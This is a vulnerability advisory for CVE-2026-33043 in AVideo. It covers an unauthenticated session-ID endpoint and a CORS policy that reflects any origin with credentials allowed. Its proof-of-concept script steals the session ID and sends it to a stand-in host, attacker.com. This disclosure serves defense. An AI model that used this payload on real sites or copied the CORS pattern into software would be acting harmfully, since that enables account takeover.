CVE-2026-33043

Description

### Summary `/objects/phpsessionid.json.php` exposes the current PHP session ID to any unauthenticated request. The `allowOrigin()` function reflects any `Origin` header back in `Access-Control-Allow-Origin` with `Access-Control-Allow-Credentials: true`, enabling cross-origin session theft and full account takeover. ### Details **File:** `objects/phpsessionid.json.php` ```php allowOrigin(); $obj = new stdClass(); $obj->phpsessid = session_id(); echo _json_encode($obj); ``` No authentication is required. The `allowOrigin()` function in `objects/functions.php` (line ~2648) reflects the request Origin: ```php $HTTP_ORIGIN = empty($_SERVER['HTTP_ORIGIN']) ? @$_SERVER['HTTP_REFERER'] : $_SERVER['HTTP_ORIGIN']; header("Access-Control-Allow-Origin: " . $HTTP_ORIGIN); header("Access-Control-Allow-Credentials: true"); ``` This means any external website can make a credentialed cross-origin request and read the session ID. ### PoC An attacker hosts the following page: ```html <script> fetch('https://TARGET/objects/phpsessionid.json.php', { credentials: 'include' }) .then(r => r.json()) .then(d => { // d.phpsessid = victim's session ID document.location = 'https://attacker.com/steal?sid=' + d.phpsessid; }); </script> ``` When a logged-in AVideo user visits the attacker's page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session. ### Impact **Account Takeover** — Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.

How to fix CVE-2026-33043

No fixed version has been published yet. Mitigate by removing the affected package or applying upstream guidance from the references below.

• —no fix listed

Is CVE-2026-33043 being exploited?

Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.

Affected packages (1)